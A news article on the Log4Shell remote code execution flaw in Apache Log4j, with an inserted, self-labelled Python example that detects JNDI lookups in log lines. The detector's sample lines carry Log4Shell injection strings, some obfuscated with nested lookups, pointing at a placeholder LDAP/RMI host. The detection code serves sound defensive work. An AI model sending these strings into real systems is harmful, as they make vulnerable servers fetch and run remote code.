Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk

The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.

Tracked as CVE-2021-44228 and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 out of 10 in the CVSS rating system, indicative of the severity of the issue.

“An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” the Apache Foundation said in an advisory. “From Log4j 2.15.0, this behavior has been disabled by default.”

Exploitation can be achieved by a single string of text, which can trigger an application to reach out to a malicious external host if it is logged via the vulnerable instance of Log4j, effectively granting the adversary the ability to retrieve a payload from a remote server and execute it locally. The project maintainers credited Chen Zhaojun of Alibaba Cloud Security Team with discovering the issue.
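As an added example, not part of this article, the detector below applies the lookup-substitution behaviour described above to sample log lines before matching. Log4j resolves nested lookups innermost-first, so a detector that only searches for the literal `${jndi:` form misses lookups assembled from nested pieces; the regexes, function names and sample lines here are constructed for illustration, and example.invalid is a reserved domain name.

```python
import re

# Log4j 2 resolves nested lookups innermost-first, so the "jndi" token in a
# logged string can be assembled from pieces such as ${lower:j} or the
# default-value form ${::-j}. Undo that the way Log4j would before matching,
# otherwise only the plain ${jndi:...} form is caught.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}")
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")  # ${name:key:-default}
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def normalize(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/default lookups; bounded rounds stop runaway input."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            text,
        )
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text

def scan_lines(lines):
    """Return (line_no, scheme, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for line_no, raw in enumerate(lines, 1):
        norm = normalize(raw)
        m = _JNDI_LOOKUP.search(norm)
        if m:
            hits.append((line_no, m.group(1).lower(), norm))
    return hits

# Constructed sample lines (not real traffic); example.invalid is a reserved name.
SAMPLE_LINES = [
    "2021-12-10 12:00:01 INFO  User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "2021-12-10 12:00:02 INFO  User-Agent: ${jndi:ldap://example.invalid/a}",
    "2021-12-10 12:00:03 INFO  X-Api-Version: ${${lower:j}ndi:${lower:l}dap://example.invalid/x}",
    "2021-12-10 12:00:04 INFO  Referer: ${${::-j}ndi:rmi://example.invalid/y}",
    "2021-12-10 12:00:05 INFO  Template: ${date:yyyy-MM-dd}",
]

if __name__ == "__main__":
    for line_no, scheme, norm in scan_lines(SAMPLE_LINES):
        print(f"line {line_no}: jndi lookup via {scheme} -> {norm}")
```

Lines 2 through 4 of the sample are flagged, while the benign lookup on line 5 is not; the normalized form is kept in each hit so an analyst can see what Log4j would actually have resolved.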

Log4j is used as a logging package in a variety of different popular software by a number of manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft. In the case of the latter, attackers have been able to gain RCE on Minecraft Servers by simply pasting a specially crafted message into the chat box.

A huge attack surface

“The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year,” said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys. “Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit.”

Cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype have all confirmed evidence of mass scanning in the wild for vulnerable servers, and of attacks registered against their honeypot networks, following the availability of a proof-of-concept (PoC) exploit. “This is a low skilled attack that is extremely simple to execute,” Sonatype’s Ilkka Turunen said.
